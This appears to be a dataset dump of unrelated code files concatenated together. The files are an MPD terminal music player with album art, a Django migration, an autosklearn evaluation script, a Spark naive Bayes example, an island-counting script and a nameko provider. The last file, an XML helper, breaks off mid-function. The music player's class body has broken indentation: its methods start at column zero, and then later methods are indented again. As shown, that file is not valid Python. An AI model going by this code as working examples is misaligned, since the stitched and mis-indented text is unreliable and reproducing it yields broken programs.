if "mpd" not in config.sections():
    config["mpd"] = {"host": "localhost",
                     "port": "6600",
                     }

# Initialise keybindings
default_bindings = {">": "next_track",
                    "<": "last_track",
                    "+": "volume_up",
                    "-": "volume_down",
                    "p": "play_pause",
                    "q": "quit",
                    "h": "help",
                    "i": "toggle_info",
                    "down": "select_down",
                    "up": "select_up",
                    "enter": "select"
                    }

if "keybindings" not in config.sections():
    config["keybindings"] = default_bindings

# Load configured keybindings
keybindings = config["keybindings"]
# Unbound actions get initialised with their default keys
# except if the keys are being used for something else
for key, action in default_bindings.items():
    if (
        action not in keybindings.values()
        and key not in keybindings.keys()
    ):
        keybindings[key] = action

player_config = config["player"]
mpd_config = config["mpd"]

# FPS (main loop tick rate)
FPS = 20

# Image ratio
# Change this to match the (width, height) of your font.
IMAGERATIO = (player_config.getint("font_width", 11),
              player_config.getint("font_height", 24)
              )

# Music directory
MUSICDIR = player_config.get("music_directory", "~/Music")
MUSICDIR = os.path.expanduser(MUSICDIR)

# MPD config
MPDHOST = mpd_config.get("host", "localhost")
MPDPORT = mpd_config.getint("port", 6600)
MPDPASS = mpd_config.get("pass", False)

# What to use to draw images ("pixcat" or "ueberzug")
IMAGEMETHOD = player_config.get("image_method", "pixcat")

# Volume step
VOLUMESTEP = player_config.getint("volume_step", 5)

# Autoclose boolean (quit when the playlist finishes)
AUTOCLOSE = player_config.getboolean("auto_close", False)

# Playlist padding (columns between art pane and playlist pane)
PLAYLISTMARGIN = 4

# Config option to display the playlist
DISABLEPLAYLIST = not player_config.getboolean("show_playlist", True)
def albumArtSize(album_space, window_width, ratio=None):
    """
    Calculate the album art size given the window width (in columns) and
    the height of the album art space (in rows).

    Arguments:
        album_space  -- available height for the art, in terminal rows
        window_width -- available width, in terminal columns
        ratio        -- optional (cell_width_px, cell_height_px) of the
                        font; defaults to the configured IMAGERATIO
                        (generalized from the previous hard-coded global)
    Returns:
        (width_px, width_in_columns, height_in_rows)
    """
    if ratio is None:
        ratio = IMAGERATIO
    # Fit to whichever dimension is the binding constraint.
    if window_width * ratio[0] > album_space * ratio[1]:
        image_width_px = album_space * ratio[1]
    else:
        image_width_px = window_width * ratio[0]

    image_width = int(image_width_px // ratio[0])
    image_height = int(image_width_px // ratio[1])
    return image_width_px, image_width, image_height
class Player:
def __init__(self):
    """Initialise curses, connect to MPD, and compute the initial layout."""
    # Curses initialisation
    self.stdscr = curses.initscr()
    self.stdscr.nodelay(True)  # non-blocking getch()
    self.stdscr.keypad(True)

    # Curses config
    curses.noecho()
    curses.curs_set(0)
    curses.cbreak()
    curses.start_color()
    curses.use_default_colors()
    curses.init_pair(1, curses.COLOR_GREEN, -1)   # progress bar
    curses.init_pair(2, curses.COLOR_YELLOW, -1)  # highlights/time

    # MPD init
    self.client = MPDClient()
    self.client.connect(MPDHOST, MPDPORT)
    if MPDPASS:
        # Fix: send the configured password (source contained a garbled
        # `MP<PASSWORD>` token here).
        self.client.password(MPDPASS)

    self.last_song = None

    # Try to load default playlist from config
    default = player_config.get("default_playlist", None)
    # Only load it when the current playlist is empty
    if default and self.client.playlist() == []:
        self.client.load(default)

    # Album art only flag
    self.album_art_only = player_config.getboolean("album_art_only", False)

    # Store the status on startup so we can reset when exiting
    status = self.client.status()
    self.stored_repeat_state = int(status["repeat"])
    self.stored_shuffle_state = int(status["random"])

    # Screen size
    maxyx = self.stdscr.getmaxyx()
    self.screen_height, self.screen_width = maxyx

    # Album art window
    self.art_window_height, self.art_window_width = self.albumArtWinWidth(*maxyx)
    self.art_win = curses.newwin(
        self.art_window_height, self.art_window_width,
        0, 0
    )

    # Playlist window (only when the terminal is wide enough)
    if self.playlistFits(*maxyx) and not self.album_art_only:
        self.draw_playlist = True
        self.playlist_window_width = maxyx[1] - self.art_window_width - PLAYLISTMARGIN
        self.playlist_window_height = maxyx[0]
        self.playlist_win = curses.newwin(
            self.playlist_window_height, self.playlist_window_width,
            0, self.art_window_width + PLAYLISTMARGIN
        )
    else:
        self.draw_playlist = False
        self.playlist_win = None

    # Rows reserved at the bottom of the art window for track info
    self.text_start = int(self.art_window_height - 5)
    self.album_space = self.text_start - 2

    # Calculate the size of the image
    self.image_width_px, self.image_width, self.image_height = albumArtSize(self.album_space, self.art_window_width)
    self.image_y_pos = (self.album_space - self.image_height) // 2 + 1

    # Album art location (extracted art is written here)
    self.album_art_loc = "/tmp/aartminip.png"

    # Toggle for help menu
    self.help = False
    self.cleared = False

    # Ueberzug placement (created lazily in loop())
    self.art_placement = None

    # Update needed flag
    self.update_needed = False

    # Flag to check if any music has been played (for auto_close)
    self.has_music_been_played = False

    # A counter to check how long since playlist selection was moved
    self.control_cycle = 0

    # Selected song in playlist
    self.selected_song = 0
def playlistFits(self, height, width):
    """Return True when the terminal aspect (height/width) is wide enough
    (< 1:3) to show the playlist pane and the playlist is not disabled."""
    wide_enough = (height / width) < (1 / 3)
    return wide_enough and not DISABLEPLAYLIST
def albumArtWinWidth(self, height, width):
    """Return (height, width) for the album-art window: 2/5 of the screen
    width when the playlist pane is shown, otherwise the full width."""
    showing_playlist = self.playlistFits(height, width) and not self.album_art_only
    if showing_playlist:
        return height, round(width * 2 / 5)
    return height, width
def fitText(self):
    """
    Fit album name, artist name and song title to the art window width,
    truncating with "..." where needed.

    Returns (state, album, artist, song) where state is:
        0 -- title fits on one line, "artist - album" on the next
        1 -- artist + album too wide together; draw three separate lines
        2 -- no album; draw title and artist only
    """
    state = 0
    song = self.title
    album = self.album
    artist = self.artist
    width = self.art_window_width

    if len(song) > width:
        # Negative-stop slice keeps the first `width` chars; then swap the
        # last 4 for an ellipsis.
        song = song[:width - len(song)]
        song = song[:-4].strip() + "..."

    if len(album) == 0:
        sep = 0
    else:
        sep = 3  # length of the " - " separator

    if len(artist) + len(album) + sep > width:
        state = 1
        if len(artist) > width:
            artist = artist[:width - len(artist)]
            artist = artist[:-4].strip() + "..."
        if len(album) > width:
            album = album[:width - len(album)]
            album = album[:-4].strip() + "..."

    if len(album) == 0:
        state = 2

    return (state, album, artist, song)
def updateWindowSize(self, force_update=False):
    """
    Recompute the whole layout if the terminal was resized (or when
    force_update is True): art window, playlist window, text area and
    album-art dimensions.
    """
    window_height, window_width = self.stdscr.getmaxyx()
    if (window_height, window_width) != (self.screen_height, self.screen_width) or force_update:
        self.draw_playlist = self.playlistFits(window_height, window_width) and not self.album_art_only

        # Album art window
        self.art_window_height, self.art_window_width = self.albumArtWinWidth(window_height, window_width)

        # Playlist window
        if self.draw_playlist:
            self.playlist_window_width = window_width - self.art_window_width - PLAYLISTMARGIN
            self.playlist_window_height = window_height
        # Close the playlist window if it exists
        elif self.playlist_win is not None:
            del self.playlist_win
            self.playlist_win = None

        # Reserve bottom rows for track info unless in art-only mode
        if self.album_art_only:
            self.text_start = int(self.art_window_height)
            self.album_space = self.text_start - 1
        else:
            self.text_start = int(self.art_window_height - 5)
            self.album_space = self.text_start - 2

        # Calculate the size of the image
        self.image_width_px, self.image_width, self.image_height = albumArtSize(self.album_space, self.art_window_width)
        self.image_y_pos = (self.album_space - self.image_height) // 2 + 1

        # Resize an existing playlist window, or create one if it is newly
        # needed (also force a song refresh so the art is redrawn).
        if self.playlist_win is not None and self.draw_playlist:
            self.playlist_win.clear()
            self.playlist_win.refresh()
            self.playlist_win.resize(
                self.playlist_window_height,
                self.playlist_window_width
            )
            self.playlist_win.mvwin(0, self.art_window_width + PLAYLISTMARGIN)
        elif self.draw_playlist:
            self.playlist_win = curses.newwin(
                self.playlist_window_height, self.playlist_window_width,
                0, self.art_window_width + PLAYLISTMARGIN
            )
            self.last_song = None

        # Resize the art window and remember the new screen size
        self.art_win.clear()
        self.art_win.resize(self.art_window_height, self.art_window_width)
        self.screen_height, self.screen_width = window_height, window_width
def getAlbumArt(self, song_file):
    """
    Extract embedded album art from song_file (relative to MUSICDIR) into
    self.album_art_loc via ffmpeg. On failure, generate a placeholder
    image of four staggered rectangles on a dark background.
    """
    song_file_abs = os.path.join(MUSICDIR, song_file)
    process = (
        ffmpeg
        .input(song_file_abs)
        .output(self.album_art_loc)
    )
    try:
        process.run(quiet=True, overwrite_output=True)
    except ffmpeg._run.Error:
        # No embedded art (or decode error): draw a placeholder.
        foregroundCol = "#D8DEE9"
        backgroundCol = "#262A33"
        size = 512*4
        art = Image.new("RGB", (size, size), color=backgroundCol)
        d = ImageDraw.Draw(art)
        for i in range(4):
            offset = (i - 2) * 70
            external = size/3
            x0 = round(external) - offset
            y0 = round(external) + offset
            x1 = round(external*2) - offset
            y1 = round(external*2) + offset
            externalyx = [(x0, y0), (x1, y1)]
            d.rectangle(externalyx, outline=foregroundCol, width=40)
        # Fix: PIL's resize() is not in-place — the original discarded its
        # result and saved the full-size image.
        art = art.resize((512, 512))
        art.save(self.album_art_loc, "PNG")
def getSongInfo(self, song):
    """
    Return (album, artist, title) for an MPD song dict.

    Missing album/artist fall back to "". A missing title falls back to
    the base name of the song's file path.
    """
    # dict.get replaces the original try/except KeyError chains.
    album = song.get("album", "")
    artist = song.get("artist", "")
    if "title" in song:
        title = song["title"]
    else:
        # If no title, use base file name
        title = os.path.basename(song["file"])
    return album, artist, title
def checkSongUpdate(self):
    """
    Check playback state and refresh cached song info/art if needed.

    Returns:
        1 -- playback state is "stop"
        0 -- a new song started playing (caches and album art refreshed)
        2 -- the same song is still playing
    (The original docstring had 0 and 2 swapped relative to the code.)
    """
    status = self.client.status()
    if status["state"] == "stop":
        return 1
    song = self.client.currentsong()
    self.elapsed = float(status["elapsed"])
    self.duration = float(status["duration"])
    self.progress = self.elapsed/self.duration
    if self.last_song != song:
        self.art_win.clear()
        # Move selected_song to the currently playing one, unless the user
        # is actively navigating the playlist (control_cycle != 0).
        if self.control_cycle == 0:
            self.selected_song = int(song["pos"])
        self.album, self.artist, self.title = self.getSongInfo(song)
        self.last_song = song
        self.getAlbumArt(song["file"])
        self.last_song = song
        return 0
    else:
        return 2
def toggleInfo(self):
    """
    Toggle album-art-only mode and rebuild the layout accordingly.
    """
    self.album_art_only = not self.album_art_only
    self.updateWindowSize(force_update=True)
    self.art_win.clear()
    self.art_win.refresh()
def handleKeypress(self):
    """
    Drain and handle every pending keypress.

    Default keys (all rebindable via the [keybindings] config section):
        '>' -- Next track      '<' -- Last track
        '+' -- Volume up       '-' -- Volume down
        'p' -- Play/pause      'q' -- Quit
        'h' -- Help            'i' -- Toggle info
        up/down/enter -- navigate and select in the playlist
    """
    # Actions that stay available while playback is stopped.
    anytime_keys = ["quit", "help", "select_up", "select_down", "select"]
    # Map curses special key codes to the names used in the config.
    special_key_map = {curses.KEY_UP: "up",
                       curses.KEY_DOWN: "down",
                       curses.KEY_LEFT: "left",
                       curses.KEY_RIGHT: "right",
                       curses.KEY_ENTER: "enter",
                       10: "enter",
                       32: "space"
                       }
    if self.checkSongUpdate() == 1:
        stopped = True
    else:
        stopped = False

    # Get key (getch() is non-blocking; -1 means no more input)
    key = self.stdscr.getch()
    while key > 0:
        # Resolve every key in buffer
        if key in special_key_map.keys():
            keyChar = special_key_map[key]
        else:
            keyChar = chr(key).lower()

        # Get playlist length
        playlist_length = len(self.client.playlist())

        # Parse key: unbound keys are ignored
        if keyChar not in keybindings.keys():
            key = self.stdscr.getch()
            continue
        else:
            action = keybindings[keyChar]

        # While stopped, only the anytime actions are honoured
        if stopped and action not in anytime_keys:
            key = self.stdscr.getch()
            continue

        if action == "next_track":
            self.client.next()
            self.update_needed = True
        elif action == "last_track":
            self.client.previous()
            self.update_needed = True
        elif action == "play_pause":
            self.client.pause()
        elif action == "volume_up":
            self.client.volume(str(VOLUMESTEP))
        elif action == "volume_down":
            self.client.volume(str(-VOLUMESTEP))
        elif action == "quit":
            raise KeyboardInterrupt
        elif action == "help":
            self.help = not self.help
            self.cleared = False
            self.update_needed = True
        elif action == "toggle_info":
            self.toggleInfo()
            self.update_needed = True
        elif action == "select_up":
            self.control_cycle = 1
            if playlist_length > 0:
                self.selected_song = (self.selected_song - 1) % playlist_length
            self.update_needed = True
        elif action == "select_down":
            self.control_cycle = 1
            if playlist_length > 0:
                self.selected_song = (self.selected_song + 1) % playlist_length
            self.update_needed = True
        elif action == "select":
            self.control_cycle = 1
            if playlist_length > 0:
                self.client.play(self.selected_song % playlist_length)
            self.update_needed = True
            self.last_song = None
        elif action == "repeat_toggle":
            self.client.repeat(0 if self.client.status()["repeat"] == "1" else 1)
        elif action == "random_toggle":
            self.client.random(0 if self.client.status()["random"] == "1" else 1)

        key = self.stdscr.getch()
def drawInfo(self):
    """
    Draw the track info (title/artist/album), progress bar, elapsed/total
    time and repeat/shuffle indicators below the album art.
    """
    state, album, artist, title = self.fitText()
    if len(self.artist) == 0:
        seperator = ""
    else:
        seperator = " - "

    if state == 0:
        # Everything fits
        self.art_win.addstr(self.text_start, 0, f"{title}")
        self.art_win.addstr(self.text_start + 1, 0, f"{artist}{seperator}{album}")
    elif state == 1:
        # Too wide: one line each for title, album and artist
        self.art_win.addstr(self.text_start - 1, 0, f"{title}")
        self.art_win.addstr(self.text_start, 0, f"{album}")
        self.art_win.addstr(self.text_start + 1, 0, f"{artist}")
    else:
        # No album
        self.art_win.addstr(self.text_start, 0, f"{title}")
        self.art_win.addstr(self.text_start + 1, 0, f"{artist}")

    # Fix: divmod on the rounded total avoids the old int()/round() split,
    # which could display ":60" for times just under a minute
    # (e.g. 179.6s -> 2:60 instead of 3:00).
    song_duration = divmod(round(self.duration), 60)
    song_elapsed = divmod(round(self.elapsed), 60)

    # Progress bar
    self.art_win.addstr(
        self.text_start + 2, 0,
        "-"*(int((self.art_window_width - 1) * self.progress)) + ">",
        curses.color_pair(1)
    )

    # Duration string, right-aligned on its row
    time_string = f"{song_elapsed[0]}:{song_elapsed[1]:02d}/{song_duration[0]}:{song_duration[1]:02d}"
    self.art_win.addstr(
        self.text_start + 3, self.art_win.getmaxyx()[1]-len(time_string),
        f"{time_string}",
        curses.color_pair(2)
    )

    # Repeat/shuffle indicators (highlighted when active)
    if self.client.status()["repeat"] == "1":
        self.art_win.addstr(self.text_start+3, 0, "rpt", curses.color_pair(2))
    else:
        self.art_win.addstr(self.text_start+3, 0, "rpt")
    if self.client.status()["random"] == "1":
        self.art_win.addstr(self.text_start+4, 0, "shf", curses.color_pair(2))
    else:
        self.art_win.addstr(self.text_start+4, 0, "shf")

    self.art_win.refresh()
def drawPlaylist(self):
    """
    Draw the playlist pane, keeping the selected entry visible and
    highlighting the currently playing song.
    """
    # Draw playlist
    if not self.draw_playlist:
        return

    playlist = self.client.playlistinfo()
    current_song = self.client.currentsong()
    playlist_length = len(self.client.playlist())

    # Empty playlist: just clear the pane
    if playlist_length == 0:
        selected_pos = 0
        self.playlist_win.erase()
        self.playlist_win.refresh()
        return

    selected_pos = self.selected_song % len(playlist)

    # Determine where to start the playlist so the selection stays roughly
    # centered once it scrolls past the middle of the pane.
    if selected_pos > self.playlist_window_height // 2 and len(playlist) > self.playlist_window_height:
        start = selected_pos - (self.playlist_window_height - 1) // 2
    else:
        start = 0
    start = min(abs(len(playlist) - self.playlist_window_height), start)

    line = 0
    while line < self.playlist_window_height:
        # Rows past the end of the playlist are drawn empty
        if line + start < len(playlist):
            playlist_item = playlist[start + line]
        else:
            playlist_item = None

        # Decide color: playing song is highlighted, selection is reversed
        pair = 0
        if playlist_item == current_song:
            pair = curses.color_pair(2)
        if playlist_item == playlist[selected_pos]:
            pair = curses.color_pair(2) | curses.A_REVERSE

        # Move and write text (curses errors near the border end the draw)
        try:
            self.playlist_win.move(line, 0)
            if playlist_item is not None:
                _, artist, title = self.getSongInfo(playlist_item)
                if artist == "":
                    sep = ""
                else:
                    sep = " - "
                self.playlist_win.addstr(
                    f"{artist}{sep}{title}"[:self.playlist_window_width - 1],
                    pair
                )
            self.playlist_win.clrtoeol()
        except curses.error:
            return
        line += 1

    self.playlist_win.refresh()
def hideAlbumArt(self):
    """
    Hide the album art.

    Only ueberzug placements support hiding; pixcat-drawn art is simply
    overdrawn by subsequent curses output.
    """
    if IMAGEMETHOD == "ueberzug":
        self.art_placement.visibility = ueberzug.Visibility.INVISIBLE
def drawAlbumArt(self):
    """
    Draw the album art centered in the art window, using the configured
    image backend (ueberzug or pixcat).
    """
    if IMAGEMETHOD == "ueberzug":
        # Figure out new placement (centered horizontally)
        self.art_placement.x = (self.art_window_width - self.image_width)//2
        self.art_placement.y = self.image_y_pos

        # Figure out height and width
        self.art_placement.width = self.image_width
        self.art_placement.height = self.album_space

        # Update image
        self.art_placement.path = self.album_art_loc

        # Display image
        self.art_placement.visibility = ueberzug.Visibility.VISIBLE

    elif IMAGEMETHOD == "pixcat":
        (
            pixcat.Image(self.album_art_loc)
            .thumbnail(self.image_width_px)
            .show(x=(self.art_window_width - self.image_width)//2, y=self.image_y_pos)
        )
def centerText(self, y: int, string: str):
    """Draw *string* horizontally centered on row *y* of the art window."""
    start_col = int(self.art_window_width / 2 - len(string) / 2)
    self.art_win.addstr(y, start_col, string)
def drawHelp(self):
    """
    Draw the keymap help screen, listing each bound key and its action.
    """
    # Top vspace
    top_vspace = 3
    # Left and right margin pct
    lr_margin_pct = 0.1
    lr_margin = round(self.art_window_width * lr_margin_pct)
    # Actual space for text
    x_space = self.art_window_width - 2 * (lr_margin)

    # Check if window has been cleared
    if not self.cleared:
        self.art_win.clear()
        self.cleared = True

    # Figure out center, y_start and x_start
    y_start = top_vspace
    x_start = int(lr_margin)

    # Draw title
    self.centerText(y_start, "Keymap")

    # Draw one "key .... action" line per binding
    for key, desc in keybindings.items():
        y_start += 1
        sep = "." * (x_space - len(key) - len(desc) - 2)
        desc = desc.replace("_", " ").capitalize()
        self.art_win.addstr(y_start, x_start, f"{key} {sep} {desc}")

    self.art_win.refresh()
    def draw(self):
        """
        Draw one frame of the now-playing view.

        Handles the stopped state (optionally auto-closing once a
        playlist has concluded), otherwise draws the track info, the
        playlist and the album art.
        """
        if not self.cleared:
            self.art_win.clear()
            self.cleared = True
        # Touch the first line so curses repaints it on refresh
        self.art_win.redrawln(0, 1)
        self.art_win.addstr(0, 0, " ")
        # Get mpd state
        state = self.checkSongUpdate()
        # Check if state is stop
        if state == 1:
            if self.has_music_been_played and AUTOCLOSE:
                # The playlist has concluded and autoclose is enabled;
                # KeyboardInterrupt unwinds into loop()'s cleanup path.
                raise KeyboardInterrupt
            self.art_win.clear()
            self.hideAlbumArt()
            infomsg = "Put some beats on!"
            self.art_win.addstr(self.art_window_height // 2, (self.art_window_width - len(infomsg)) // 2, infomsg)
            self.art_win.refresh()
            self.drawPlaylist()
            return
        self.has_music_been_played = True
        # Playing/paused: draw the info pane (unless album-art-only),
        # the playlist and the cover image
        if not self.album_art_only:
            self.drawInfo()
        self.drawPlaylist()
        self.drawAlbumArt()
    @ueberzug.Canvas()
    def loop(self, canvas):
        """
        The main program loop.

        Handles keypresses, redraws at most once per second (or when an
        update is flagged), and on exit restores the terminal and the
        saved mpd repeat/shuffle settings.  The `canvas` argument is
        injected by the @ueberzug.Canvas() decorator.
        """
        if self.art_placement is None and IMAGEMETHOD == "ueberzug":
            # Create album art placement if we are using ueberzug
            self.art_placement = canvas.create_placement(
                "art",
                scaler=ueberzug.ScalerOption.FIT_CONTAIN.value
            )
        # Check if we need to recalculate window size
        # because of album art only initially
        if self.album_art_only:
            self.updateWindowSize(force_update=True)
        try:
            i = 0
            while True:
                s = time.perf_counter()
                self.handleKeypress()
                # Redraw once per second (i == 0) or when flagged
                if i == 0 or self.update_needed:
                    # Check for a window size update
                    self.updateWindowSize()
                    if not self.help:
                        self.draw()
                    else:
                        self.hideAlbumArt()
                        self.drawHelp()
                    self.update_needed = False
                # Update control_cycle once a second if it is not 0
                if i == 0 and self.control_cycle != 0:
                    self.control_cycle = (self.control_cycle + 1) % 30
                # Sleep the remainder of this frame's time budget
                e = time.perf_counter()
                sleeptime = abs(1/FPS - (e-s))
                time.sleep(sleeptime)
                i = (i + 1) % FPS
        except KeyboardInterrupt:
            error = False
        except pixcat.terminal.KittyAnswerTimeout:
            error = "Kitty did not answer in time. Are you using Kitty?"
        except Exception as e:
            error = e
            # lets the finally clause handle an unexpected error
        finally:
            curses.nocbreak()
            curses.endwin()
            # Restore "old" mpd settings
            self.client.repeat(self.stored_repeat_state)
            self.client.random(self.stored_shuffle_state)
            self.client.close()
            self.client.disconnect()
        if error:
            print(error)
# Script entry point: construct the player and run until interrupted.
try:
    player = Player()
    player.loop()
except ConnectionRefusedError:
    # Leave curses mode before printing so the message is readable.
    curses.nocbreak()
    curses.endwin()
    print(f"Could not connect to mpd on {MPDHOST}:{MPDPORT}")
| StarcoderdataPython |
1702884 | <reponame>morlandi/django-email-test
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-05-10 17:42
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django_email_test.models
class Migration(migrations.Migration):
    """Auto-generated Django migration: adjust field defaults/options on TestEmail."""

    dependencies = [
        ('django_email_test', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='testemail',
            name='bcc',
            field=models.TextField(blank=True, default=''),
        ),
        migrations.AlterField(
            model_name='testemail',
            name='body',
            field=models.TextField(default="Here's some default text."),
        ),
        migrations.AlterField(
            model_name='testemail',
            name='date',
            field=models.DateTimeField(default=datetime.datetime.now, help_text='The date you want to set as the date header.'),
        ),
        migrations.AlterField(
            model_name='testemail',
            name='error',
            field=models.TextField(blank=True, default='', editable=False),
        ),
        migrations.AlterField(
            model_name='testemail',
            name='from_email',
            field=models.CharField(default=django_email_test.models.test_email_default_from_email, max_length=150, verbose_name='from'),
        ),
        migrations.AlterField(
            model_name='testemail',
            name='subject',
            field=models.CharField(default='This is a test email.', max_length=150),
        ),
        migrations.AlterField(
            model_name='testemail',
            name='to',
            field=models.TextField(blank=True, default=''),
        ),
    ]
| StarcoderdataPython |
115991 | <reponame>e-orlov/autosklearn-zeroconf
# -*- coding: utf-8 -*-
"""
Copyright 2017 <NAME>
Created on Sun Apr 23 11:52:59 2017
@author: ekobylkin
This is an example on how to prepare data for autosklearn-zeroconf.
It is using a well known Adult (Salary) dataset from UCI https://archive.ics.uci.edu/ml/datasets/Adult .
"""
import pandas as pd
# Load the held-out test labels and the zeroconf predictions, join them
# on cust_id, and report standard classification metrics.
test = pd.read_csv(filepath_or_buffer='./data/adult.test.withid', sep=',', error_bad_lines=False, index_col=False)
prediction = pd.read_csv(filepath_or_buffer='./data/zeroconf-result.csv', sep=',', error_bad_lines=False, index_col=False)

# Inner join so metrics are only computed for ids present in both files.
df = pd.merge(test, prediction, how='inner', on=['cust_id', ])
y_test = df['category']
y_hat = df['prediction']

from sklearn.metrics import (confusion_matrix, precision_score,
                             recall_score, f1_score, accuracy_score)
from time import time, sleep, strftime


def p(text):
    """Print each line of *text* prefixed with [ZEROCONF] and suffixed with a timestamp."""
    for line in str(text).splitlines():
        print('[ZEROCONF] ' + line + " # " + strftime("%H:%M:%S") + " #")


p("\n")
p("#" * 72)
p("Accuracy score {0:2.0%}".format(accuracy_score(y_test, y_hat)))
p("The below scores are calculated for predicting '1' category value")
p("Precision: {0:2.0%}, Recall: {1:2.0%}, F1: {2:.2f}".format(
    precision_score(y_test, y_hat), recall_score(y_test, y_hat), f1_score(y_test, y_hat)))
p("Confusion Matrix: https://en.wikipedia.org/wiki/Precision_and_recall")
p(confusion_matrix(y_test, y_hat))
# Baseline: fraction of positive labels in the test set.  Computed once
# here; the original summed y_test three separate times and also built
# three baseline_* strings that were never used.
positives = sum(a for a in y_test)
total = len(y_test)
p("Baseline %s positives from %s overall = %1.1f%%" %
  (positives, total, 100 * positives / total))
p("#" * 72)
p("\n")
| StarcoderdataPython |
3398227 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
A naive bayes program using MLlib.
This example requires NumPy (http://www.numpy.org/).
"""
import sys
from pyspark import SparkContext
from pyspark.mllib.util import MLUtils
from pyspark.mllib.classification import NaiveBayes
from pyspark.mllib.regression import LabeledPoint
from pyspark.mllib.linalg import Vectors
from pyspark.storagelevel import StorageLevel
from operator import add
from itertools import groupby
#
# Adopted from spark's doc: http://spark.apache.org/docs/latest/mllib-naive-bayes.html
#
def parseVector(line):
    """Parse a space-separated line of numbers into a NumPy float array.

    Bug fix: the module header says NumPy is required but never imported
    it, so calling this helper raised NameError.  The import is kept
    local so the fix does not touch the rest of the (otherwise
    numpy-free) example.
    """
    import numpy as np
    return np.array([float(x) for x in line.split(' ')])
if __name__ == "__main__":
    # NOTE(review): Python 2 syntax throughout (print statements and
    # tuple parameter unpacking in lambdas); this example does not run
    # under Python 3.
    if len(sys.argv) != 2:
        print >> sys.stderr, "Usage: bayes <file>"
        exit(-1)
    sc = SparkContext(appName="PythonNaiveBayes")
    filename = sys.argv[1]

    # Read (docKey, text) pairs from a Hadoop sequence file.
    data = sc.sequenceFile(filename, "org.apache.hadoop.io.Text", "org.apache.hadoop.io.Text")
    # Global word frequencies across all documents.
    wordCount = data \
        .flatMap(lambda (key, doc):doc.split(" ")) \
        .map(lambda x:(x, 1)) \
        .reduceByKey(add)
    wordSum = wordCount.map(lambda x:x[1]).reduce(lambda x,y:x+y)
    # word -> (feature index, relative frequency), broadcast to workers.
    wordDict = wordCount.zipWithIndex() \
        .map(lambda ((key, count), index): (key, (index, count*1.0 / wordSum)) ) \
        .collectAsMap()
    sharedWordDict = sc.broadcast(wordDict)

    # for each document, generate vector based on word freq
    def doc2vector(dockey, doc):
        # map to word index: freq
        # combine freq with same word
        docVector = [(key, sum((z[1] for z in values))) for key, values in
                     groupby(sorted([sharedWordDict.value[x] for x in doc.split(" ")],
                                    key=lambda x:x[0]),
                             key=lambda x:x[0])]
        (indices, values) = zip(*docVector) # unzip
        # assumes keys look like "<6-char prefix><numeric label>" -- TODO confirm
        label = float(dockey[6:])
        return label, indices, values

    vector = data.map( lambda (dockey, doc) : doc2vector(dockey, doc))
    vector.persist(StorageLevel.MEMORY_ONLY)

    # Feature-space dimensionality: highest feature index seen, plus one.
    d = vector.map( lambda (label, indices, values) : indices[-1] if indices else 0)\
        .reduce(lambda a,b:max(a,b)) + 1
    # print "###### Load svm file", filename
    #examples = MLUtils.loadLibSVMFile(sc, filename, numFeatures = numFeatures)
    examples = vector.map( lambda (label, indices, values) : LabeledPoint(label, Vectors.sparse(d, indices, values)))
    examples.cache()

    # FIXME: need randomSplit!
    # NOTE(review): two independent sample() calls can overlap or miss
    # rows, so training and test are not a true partition of the data.
    training = examples.sample(False, 0.8, 2)
    test = examples.sample(False, 0.2, 2)

    numTraining = training.count()
    numTest = test.count()
    print " numTraining = %d, numTest = %d." % (numTraining, numTest)

    model = NaiveBayes.train(training, 1.0)
    model_share = sc.broadcast(model)
    predictionAndLabel = test.map( lambda x: (x.label, model_share.value.predict(x.features)))
    # prediction = model.predict(test.map( lambda x: x.features ))
    # predictionAndLabel = prediction.zip(test.map( lambda x:x.label ))
    accuracy = predictionAndLabel.filter(lambda x: x[0] == x[1]).count() * 1.0 / numTest
    print "Test accuracy = %s." % accuracy
3240297 | import numpy as np
def preprocess(arr):
    """Binarise *arr*: positive pixels become 1, everything else 0."""
    mask = arr > 0
    return mask.astype(int)
def dfs(arr, x, y, area=False):
    """Flood-fill the island containing cell (x, y), zeroing visited cells.

    Returns the number of cells in the island.  *area* is accepted for
    interface compatibility but is unused, as in the original.
    """
    rows, cols = arr.shape
    arr[x][y] = 0
    size = 1
    for r, c in ((x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)):
        if 0 <= r < rows and 0 <= c < cols and arr[r][c] == 1:
            size += dfs(arr, r, c)
    return size
def calc(arr):
    """Count islands of 1s in *arr* (destructively) and collect their areas.

    Returns (island_count, list_of_areas).
    """
    rows, cols = arr.shape
    areas = []
    for r in range(rows):
        for c in range(cols):
            if arr[r][c] == 1:
                areas.append(dfs(arr, r, c))
    return len(areas), areas
def boxes(arr):
    """Bounding boxes for detected islands -- not implemented (returns None)."""
    # https://docs.opencv.org/3.4/dd/d49/tutorial_py_contour_features.html
    pass
def calculate(image):
    """Binarise *image*, then return (island_count, areas, binary_image)."""
    binary = preprocess(image)
    count, areas = calc(binary)
    return count, areas, binary
if __name__ == '__main__':
    # Demo grid: three islands with areas 4, 1 and 2.
    arr = np.array([
        [1, 1, 0, 0, 0],
        [1, 1, 0, 0, 0],
        [0, 0, 1, 0, 0],
        [0, 0, 0, 1, 1]
    ])
    islands, area = calc(arr)
    print("Islands : ", islands)
    print("Area list: ", area)
| StarcoderdataPython |
1669327 | from collections import namedtuple
from nameko.extensions import DependencyProvider
class ServiceDependencyProvider(DependencyProvider):
    """Expose a fixed set of services to workers as a named-tuple dependency."""

    def make_dependency(self, **services):
        """Build a namedtuple '<ClassName>Dependency' holding *services*."""
        type_name = '{}Dependency'.format(self.__class__.__name__)
        dependency_cls = namedtuple(type_name, services.keys())
        return dependency_cls(**services)

    def get_dependency(self, worker_ctx):
        """Return the dependency object injected into the service worker."""
        configured = getattr(self, 'services', {})
        return self.make_dependency(**configured)
| StarcoderdataPython |
171925 | # xml.py
# ------------------------------------------------------------------------------------------------ #
def indent(elem, level=0):
    """Recursively insert whitespace into *elem*'s text/tail so that
    ElementTree serializes it pretty-printed, one level per line."""
    pad = "\n" + level*" "
    if len(elem):
